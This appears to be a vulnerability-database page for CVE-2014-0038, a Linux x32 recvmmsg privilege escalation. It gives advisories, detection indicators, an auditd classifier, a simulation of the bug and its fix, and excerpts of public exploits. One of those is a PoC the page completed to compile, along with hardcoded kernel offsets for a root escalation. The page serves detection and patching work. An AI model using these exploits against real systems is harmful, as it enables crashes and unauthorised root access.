CVE-2014-0038
Published 2014-02-06
Priority P3 · 56 · medium · 6.9 (CVSS 2.0)
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C
Exploit available · EPSS 34.65% (98.2nd percentile)
The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | < 3.13.4-1 (bookworm) | 3.13.4-1 (bookworm) |
| linux | linux_kernel | >= 0 < 3.13.4-1 | 3.13.4-1 |
| linux | linux_kernel | >= 3.11 < 3.12.10 | 3.12.10 |
| linux | linux_kernel | >= 3.13 < 3.13.2 | 3.13.2 |
| linux | linux_kernel | >= 3.4 < 3.4.79 | 3.4.79 |
| linux | linux_kernel | >= 3.5 < 3.10.29 | 3.10.29 |
| opensuse | opensuse | — | — |
Note: 3.13.4-1 is the Debian package version, not an upstream release. The upstream stable fixes are 3.4.79, 3.10.29, 3.12.10 and 3.13.2, which carry backports of commit 2def2ef2ae5f3990aabdbe8a755911902707d268.
Detection & IOCs (extracted from sources)
filename: recvmmsg (pre-compiled exploit binary, stored under Msf::Config.data_directory/exploits/CVE-2014-0038/)
bytes: 0x90 (NOP sled filling the PAGE_SIZE*3 mapped region)
- Detect the x32-ABI recvmmsg syscall (syscall number __X32_SYSCALL_BIT + 537 = 0x40000000 + 0x219 = 0x40000219) issued with a bogus or kernel-space timeout pointer (e.g. (void *)1) from an unprivileged process; this is the core trigger.
- Alert on mmap() with MAP_FIXED|MAP_ANONYMOUS|PROT_EXEC from an unprivileged process at an address derived from a kernel symbol, i.e. a 0xffffffff8xxxxxxx address with its top bytes zeroed to 0x000000ff8xxxxxxx; the exploit maps its payload where the corrupted kernel pointer will land.
- Monitor for unprivileged processes opening /proc/sys/net/core/somaxconn read-only right after a series of x32 recvmmsg syscalls; opening a sysctl file is the exploit's privilege-check trigger step (the corrupted pointer is net_sysctl_root.permissions).
- Detect an open of /dev/ptmx followed immediately by close() from a process that previously issued x32 recvmmsg syscalls; the alternate exploit (EDB-31346) overwrites ptmx_fops->release and triggers it on close.
- Flag processes that write a C source file into /tmp, compile it with gcc, chmod +x the result and execute it; this matches the Metasploit module's live-compile workflow.
- Alert on the hardcoded pre-compiled payload filename 'a0RwAacU' under /tmp, a static artifact of the Metasploit module's pre-compiled exploit path.
- Audit the running kernel for CONFIG_X86_X32=y (in /boot/config-$(uname -r) or /proc/config.gz); it is the prerequisite for the vulnerable path to be reachable at all.
- Detect long-running (up to 765 seconds) loopback UDP traffic paired with repeated x32 recvmmsg syscalls; the exploit zeroes a kernel pointer one byte at a time, and each byte takes up to 0xff seconds because the written-back tv_sec drops by one per second.
Caveats:
- The bug is only reachable when the kernel was built with CONFIG_X86_X32=y. Most major distributions did not ship with this option enabled, which limited exposure; the Ubuntu 13.04/13.10 kernels targeted by the public exploits did.
- The hardcoded kernel offsets in the public exploits are specific to three Ubuntu 13.x kernels (3.8.0-19-generic, 3.11.0-12-generic, 3.11.0-15-generic); the exploits fail on any other build unless the offsets are adapted from System.map or /proc/kallsyms.
- The public exploits use hardcoded offsets because /proc/kallsyms is restricted on those Ubuntu kernels; restricting kallsyms therefore does not stop exploitation of a known kernel build, it only forces the attacker to obtain the offsets elsewhere.
- The Metasploit module sets WfsDelay to 780 seconds to cover the full exploitation time; exploit activity may span up to 13 minutes before privilege escalation completes.
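To turn the syscall-number and kernel-config points above into something a SOC can actually run, the C program below is an added example written for this page, not code from any of the sources it cites. It classifies auditd SYSCALL records by syscall number, flags anything with __X32_SYSCALL_BIT (0x40000000) set, and singles out x32 recvmmsg (table entry 537, which auditd prints in decimal as 1073742361) from a non-root uid. The three records are constructed for the example, as are their pids and timestamps, and the arch=c000003e value for x32 entries on an x86-64 host is an assumption; adapt the field parsing if your records differ.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define X32_SYSCALL_BIT 0x40000000UL
#define X32_NR_RECVMMSG 537UL    /* 0x40000000 + 537 == 0x40000219 == 1073742361 */

/* Constructed auditd SYSCALL records (not real captures): an x32 recvmmsg from
 * uid 1000, an ordinary 64-bit recvmmsg (nr 299) from root, and an x32 write
 * (nr 0x40000001) from uid 1000. auditd prints syscall numbers in decimal. */
static const char *const SAMPLE_RECORDS[] = {
    "type=SYSCALL msg=audit(1391172000.101:201): arch=c000003e syscall=1073742361 "
    "success=yes exit=0 a0=3 a1=7fff5f3e0a00 a2=a a3=0 items=0 ppid=2210 pid=2244 "
    "auid=1000 uid=1000 gid=1000 euid=1000 comm=\"recvmmsg\" exe=\"/tmp/recvmmsg\"",
    "type=SYSCALL msg=audit(1391172000.102:202): arch=c000003e syscall=299 "
    "success=yes exit=1 a0=5 a1=7ffd2c1e1b40 a2=1 a3=0 items=0 ppid=1 pid=900 "
    "auid=4294967295 uid=0 gid=0 euid=0 comm=\"systemd-journal\" exe=\"/lib/systemd/systemd-journald\"",
    "type=SYSCALL msg=audit(1391172000.103:203): arch=c000003e syscall=1073741825 "
    "success=yes exit=5 a0=1 a1=7fff5f3e0c00 a2=5 a3=0 items=0 ppid=2210 pid=2244 "
    "auid=1000 uid=1000 gid=1000 euid=1000 comm=\"recvmmsg\" exe=\"/tmp/recvmmsg\"",
};
#define NSAMPLES (sizeof SAMPLE_RECORDS / sizeof SAMPLE_RECORDS[0])

enum verdict { V_IGNORE = 0, V_X32_SYSCALL = 1, V_X32_RECVMMSG_UNPRIV = 2 };

/* Copy the value of "key=" from a space-separated key=value record into out.
 * The key must start the record or follow a space, so "uid" does not match
 * "auid" or "euid". Returns false when the key is absent. */
static bool audit_field(const char *rec, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    const char *p = rec;
    while ((p = strstr(p, key)) != NULL) {
        if ((p == rec || p[-1] == ' ') && p[klen] == '=') {
            const char *v = p + klen + 1;
            size_t n = strcspn(v, " ");
            if (n >= outsz)
                n = outsz - 1;
            memcpy(out, v, n);
            out[n] = '\0';
            return true;
        }
        p += klen;
    }
    return false;
}

/* Classify one SYSCALL record: any syscall with the x32 bit set deserves a look
 * on a host that ships no x32 userland; x32 recvmmsg from a non-root uid is the
 * CVE-2014-0038 trigger itself. */
static enum verdict classify_record(const char *rec)
{
    char buf[32];
    unsigned long nr, uid = 0;

    if (!audit_field(rec, "syscall", buf, sizeof buf))
        return V_IGNORE;
    nr = strtoul(buf, NULL, 10);
    if (!(nr & X32_SYSCALL_BIT))
        return V_IGNORE;
    if (audit_field(rec, "uid", buf, sizeof buf))
        uid = strtoul(buf, NULL, 10);
    if ((nr & ~X32_SYSCALL_BIT) == X32_NR_RECVMMSG && uid != 0)
        return V_X32_RECVMMSG_UNPRIV;
    return V_X32_SYSCALL;
}

/* Count sample records whose verdict is at least `min`. */
static int count_at_least(enum verdict min)
{
    int hits = 0;
    for (size_t i = 0; i < NSAMPLES; i++)
        if (classify_record(SAMPLE_RECORDS[i]) >= min)
            hits++;
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < NSAMPLES; i++) {
        char pid[32] = "?";
        audit_field(SAMPLE_RECORDS[i], "pid", pid, sizeof pid);
        printf("record %zu pid=%s verdict=%d\n", i + 1, pid, (int)classify_record(SAMPLE_RECORDS[i]));
    }
    return 0;
}
```

The x32-bit check is the useful generalisation: on a host with no x32 userland, any syscall number at or above 0x40000000 is anomalous whatever the syscall is, so the weaker verdict is worth a low-priority alert on its own, and the recvmmsg-from-non-root verdict is the one to page on.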
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 6.9 | MEDIUM | — |
| vendor_debian | — | 6.9 | LOW | — |
| vendor_redhat | — | 6.9 | MEDIUM | — |
GHSA
GHSA-wvfw-q8jv-g9r2: The compat_sys_recvmmsg function in net/compat
ghsa_unreviewed · 2022-05-14 · MEDIUM · CWE-20
OSV
CVE-2014-0038: The compat_sys_recvmmsg function in net/compat
osv · 2014-02-06 · CVSS 6.9 (MEDIUM)
Kernel
x86, x32: Correct invalid use of user timespec in the kernel
kernel_security · 2014-01-30 · CVSS 6.9 (MEDIUM)
The x32 case for the recvmsg() timeout handling is broken:

    asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                        unsigned int vlen, unsigned int flags,
                                        struct compat_timespec __user *timeout)
    {
            int datagrams;
            struct timespec ktspec;

            if (flags & MSG_CMSG_COMPAT)
                    return -EINVAL;

            if (COMPAT_USE_64BIT_TIME)
                    return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                          flags | MSG_CMSG_COMPAT,
                                          (struct timespec *) timeout);
    ...

The timeout pointer parameter is provided by userland (hence the __user annotation) but for x32 syscalls it's simply cast to a kernel pointer and is passed to __sys_recvmmsg which will eventually directly dereference it for both reading and writing. Other callers to __sys_recvmmsg
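The cast the commit message points at is the whole bug: __sys_recvmmsg takes a kernel pointer, reads the deadline through it and stores the remaining time back through it, so on the x32 path any address the caller supplies becomes a read-then-write target. The userland C model below is an added example written for this page; it is not kernel code and not any of the public exploits. It reduces __sys_recvmmsg's timeout handling to those two accesses, puts the vulnerable cast beside the copy-in/copy-out shape of the fix, and replays the countdown the exploits on this page use (one 0xff byte at a time, 765 one-second steps for three bytes) against a fake kernel pointer in a simulated address space. The pointer value 0xffffffff81234560, the arena layout and the 16 zero bytes after the target are assumptions of the example; the trailing zeros mirror what the exploit author says about net_sysctl_root.permissions.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* struct timespec as __sys_recvmmsg sees it on x86-64: two 64-bit fields. */
struct ktimespec { int64_t tv_sec; int64_t tv_nsec; };

/* One flat little-endian arena: the first 32 bytes play the process's own
 * mappings, the next 24 play kernel .data. The fake kernel pointer (an assumed
 * value) sits at kern_mem[0..7] and, like the net_sysctl_root.permissions
 * target the exploit author describes, is followed by 16 zero bytes. */
#define USER_SIZE 32
#define KERN_SIZE 24
#define FAKE_KERNEL_PTR 0xffffffff81234560ULL
static unsigned char arena[USER_SIZE + KERN_SIZE];
static unsigned char *const user_mem = arena;
static unsigned char *const kern_mem = arena + USER_SIZE;

static bool access_ok(const unsigned char *p, size_t n)
{
    return p >= user_mem && n <= USER_SIZE && p + n <= user_mem + USER_SIZE;
}

/* __sys_recvmmsg's timeout handling reduced to the two accesses that matter:
 * read *timeout to set the deadline, then store the remaining time through the
 * same pointer on return. memcpy stands in for the kernel's plain loads and
 * stores, which work at any alignment. */
static int recvmmsg_core(unsigned char *timeout, int64_t elapsed_sec)
{
    struct ktimespec ts;
    if (!timeout)
        return 0;
    memcpy(&ts, timeout, sizeof ts);
    if (ts.tv_sec < 0 || ts.tv_nsec < 0 || ts.tv_nsec >= 1000000000LL)
        return -EINVAL;
    ts.tv_sec = ts.tv_sec > elapsed_sec ? ts.tv_sec - elapsed_sec : 0;
    ts.tv_nsec = 0;
    memcpy(timeout, &ts, sizeof ts);
    return 0;
}

/* Vulnerable x32 path (before 3.13.2): the __user pointer is cast and passed
 * through unchanged, so any address the caller names is read, then written. */
static int compat_recvmmsg_vuln(unsigned char *user_timeout, int64_t elapsed_sec)
{
    return recvmmsg_core(user_timeout, elapsed_sec);
}

/* Shape of the fix: refuse non-user addresses, copy in, run the core on a
 * kernel-side copy, copy the result back out. */
static int compat_recvmmsg_fixed(unsigned char *user_timeout, int64_t elapsed_sec)
{
    struct ktimespec k;
    int rc;
    if (!user_timeout)
        return recvmmsg_core(NULL, elapsed_sec);
    if (!access_ok(user_timeout, sizeof k))
        return -EFAULT;
    memcpy(&k, user_timeout, sizeof k);
    rc = recvmmsg_core((unsigned char *)&k, elapsed_sec);
    if (rc == 0)
        memcpy(user_timeout, &k, sizeof k);
    return rc;
}

static uint64_t read_target(void)
{
    uint64_t v;
    memcpy(&v, kern_mem, sizeof v);
    return v;
}

/* The exploits' primitive: aim timeout at byte `off` of the pointer so the
 * kernel reads that 0xff byte plus the zeros behind it as tv_sec = 255, then
 * make recvmmsg return once a second until the stored remainder is zero.
 * Returns the number of one-second steps taken. */
static int zero_byte(int (*compat)(unsigned char *, int64_t), size_t off)
{
    int steps = 0;
    while (kern_mem[off] != 0 && steps < 1000 && compat(kern_mem + off, 1) == 0)
        steps++;
    return steps;
}

/* Plant the pointer, then clear bytes 7, 6 and 5 in turn as the exploit does.
 * Returns the total steps: 765 (0xff * 3) vulnerable, 0 fixed. */
static int run_countdown(int (*compat)(unsigned char *, int64_t))
{
    uint64_t ptr = FAKE_KERNEL_PTR;
    int total;
    memset(kern_mem, 0, KERN_SIZE);
    memcpy(kern_mem, &ptr, sizeof ptr);
    total = zero_byte(compat, 7);
    total += zero_byte(compat, 6);
    total += zero_byte(compat, 5);
    return total;
}

int main(void)
{
    int steps = run_countdown(compat_recvmmsg_vuln);
    printf("vulnerable: %d steps, pointer now 0x%016llx\n", steps, (unsigned long long)read_target());
    steps = run_countdown(compat_recvmmsg_fixed);
    printf("fixed: %d steps, pointer still 0x%016llx\n", steps, (unsigned long long)read_target());
    return 0;
}
```

Run it and the vulnerable path reports 765 steps and a pointer that now reads 0x000000ff81234560, a user-mappable address on x86-64: that is why the exploits mmap() their payload at the masked address and why the whole thing takes about 13 minutes. The fixed path returns -EFAULT on the first call and leaves the pointer alone, while a timeout that really lives in user memory still goes through.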
Ubuntu
Linux kernel (Raring HWE) vulnerability
vendor_ubuntu · 2014-01-31
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Ubuntu
Linux kernel (Saucy HWE) vulnerability
vendor_ubuntu · 2014-01-31
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Red Hat
Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
vendor_redhat · 2014-01-31 · CVSS 6.9 (MEDIUM)
Statement: Not vulnerable. This issue does not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5, 6 and Red Hat Enterprise MRG 2.
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: realtime-kernel (Red Hat Enterprise MRG 2) - Not affected
Ubuntu
Linux kernel vulnerability
vendor_ubuntu · 2014-01-31
Summary: The system could be made to crash or run programs as an administrator.
Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called from code using the x32 ABI. An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or gain administrator privileges.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Debian
CVE-2014-0038: linux - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13...
vendor_debian · 2014 · CVSS 6.9 (MEDIUM)
Scope: local
bookworm: resolved (fixed in 3.13.4-1)
bullseye: resolved (fixed in 3.13.4-1)
forky: resolved (fixed in 3.13.4-1)
sid: resolved (fixed in 3.13.4-1)
trixie: resolved (fixed in 3.13.4-1)
No detection rules found.
Exploit-DB
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)
exploitdb · 2016-10-11 · CVSS 6.9 (MEDIUM)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class MetasploitModule < Msf::Exploit::Local
  ...
      'Name'        => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
      'Description' => %q{
        This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
        system call with a crafted timeout pointer parameter to gain root.
        This exploit has offsets for 3 Ubuntu 13 kernels built in:
        3.8.0-19-generic (13.04 default)
        3.11.0-12-generic (13.10 default)
        3.11.0-15-generic (13.10)
        This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
        pointer which starts at 0xff*3 (765 seconds)
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'h00die ', # M
Exploit-DB
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Escalation (3)
exploitdb · 2014-02-02 · CVSS 6.9 (MEDIUM)
... tv_sec is decremented once per second and 0xff*3 is 765.
some things you could do while waiting:
* watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
* read https://wiki.ubuntu.com/Security/Features and smirk a few times
* brew some coffee
* stare at the countdown giggly with anticipation
could probably whack the high bits of some pointer with nanoseconds,
but that would require a bunch of nulls before the pointer and then
reading an oops from dmesg which isn't that elegant.
&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
anyway..
same principle will work on 32bit but I didn't really find any major
distros shipping with CONFIG_X86_X32=y
user@ubuntu:~$ uname -a
Exploit-DB
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)
exploitdb · 2014-02-02 · CVSS 6.9 (MEDIUM)
#include <...>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define BUFSIZE 200
#define PAYLOADSIZE 0x2000
#define FOPS_RELEASE_OFFSET 13*8
/*
* Adapt these addresses for your need.
* see /boot/System.map* or /proc/kallsyms
* These are the offsets from ubuntu 3.11.0-12-generic.
*/
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
/*
*
Exploit-DB
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)
exploitdb · 2014-01-31
/* ...
 * ... /dev/udp/127.0.0.1/1234; sleep 0.25; done
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
	int sockfd, retval, i;
	struct sockaddr_in sa;
	struct mmsghdr msgs[VLEN];
	struct iovec iovecs[VLEN];
	char bufs[VLEN][BUFSIZE+1];
	struct timespec timeout;
	sockfd = socket(AF_INET, SOCK_DGRAM, 0);
	if (sockfd == -1) {
		perror("socket()");
		exit(EXIT_FAILURE);
	}
	sa.sin_family = AF_INET;
	sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
	sa.sin_port = htons(1234);
	if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
		perror("bind()");
		exit(EXIT_FAILURE);
	}
	memset(msgs, 0, sizeof(msgs));
	/* The listing is cut off after the memset above; what follows is the
	 * recvmmsg(2) man-page receive loop with the crafted timeout pointer the
	 * advisory text describes, added here to make the PoC compilable. */
	for (i = 0; i < VLEN; i++) {
		iovecs[i].iov_base         = bufs[i];
		iovecs[i].iov_len          = BUFSIZE;
		msgs[i].msg_hdr.msg_iov    = &iovecs[i];
		msgs[i].msg_hdr.msg_iovlen = 1;
	}
	timeout.tv_sec = TIMEOUT;
	timeout.tv_nsec = 0;
	/* x32 recvmmsg: a vulnerable kernel casts this pointer and dereferences it
	 * directly instead of copying it from user space, so a bogus address such
	 * as (void *)1 makes the kernel fault (oops) instead of returning -EFAULT.
	 * Feed the socket from another shell so the call returns:
	 *   while :; do echo x > /dev/udp/127.0.0.1/1234; sleep 0.25; done */
	retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1);
	if (retval == -1) {
		perror("recvmmsg()");
		exit(EXIT_FAILURE);
	}
	for (i = 0; i < retval; i++) {
		bufs[i][msgs[i].msg_len] = 0;
		printf("%d %s", i + 1, bufs[i]);
	}
	exit(EXIT_SUCCESS);
}
Metasploit
Linux Kernel recvmmsg Privilege Escalation
metasploit · CVSS 6.9 (MEDIUM)
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg system call with a crafted timeout pointer parameter to gain root. This exploit has offsets for 3 Ubuntu 13 kernels: 3.8.0-19-generic (13.04 default); 3.11.0-12-generic (13.10 default); 3.11.0-15-generic (13.10). This exploit may take up to 13 minutes to run due to a decrementing (1/sec) pointer which starts at 0xff*3 (765 seconds)
Bugzilla
CVE-2014-0038 Kernel: 3.4+ arbitrary write with CONFIG_X86_X32
bugzilla · 2014-01-31 · CVSS 6.9 (MEDIUM)
Linux kernel (>= version 3.4+) built with the X32 ABI for 64-bit mode support, CONFIG_X86_X32, is vulnerable to an arbitrary write to a user supplied address. X32 ABI allows 32-bit programs to run on 64-bit machines with all its features, without using the 64-bit addressing. These programs continue to use 32-bit memory addressing. The flaw occurs while doing a recvmmsg(2) call.
A user/program could use this flaw to crash the system resulting in DoS or potentially escalate user privileges to a system.
Upstream fix:
-> https://git.kernel.org/linus/2def2ef2ae5f3990aabdbe8a755911902707d268
Reference:
-> http://www.openwall.com/lists/oss-security/2014/01/31/2
Discussion:
Statement:
Not vulnerable. This issue does not affect the
References
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=2def2ef2ae5f3990aabdbe8a755911902707d268
http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00002.html
http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00003.html
http://pastebin.com/raw.php?i=DH3Lbg54
http://secunia.com/advisories/56669
http://www.exploit-db.com/exploits/31346
http://www.exploit-db.com/exploits/31347
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.13.2
http://www.mandriva.com/security/advisories?name=MDVSA-2014:038
http://www.openwall.com/lists/oss-security/2014/01/31/2
http://www.securityfocus.com/bid/65255
http://www.ubuntu.com/usn/USN-2094-1
http://www.ubuntu.com/usn/USN-2095-1
http://www.ubuntu.com/usn/USN-2096-1
https://bugzilla.redhat.com/show_bug.cgi?id=1060023
https://code.google.com/p/chromium/issues/detail?id=338594
https://github.com/saelo/cve-2014-0038
https://github.com/torvalds/linux/commit/2def2ef2ae5f3990aabdbe8a755911902707d268
https://www.exploit-db.com/exploits/40503/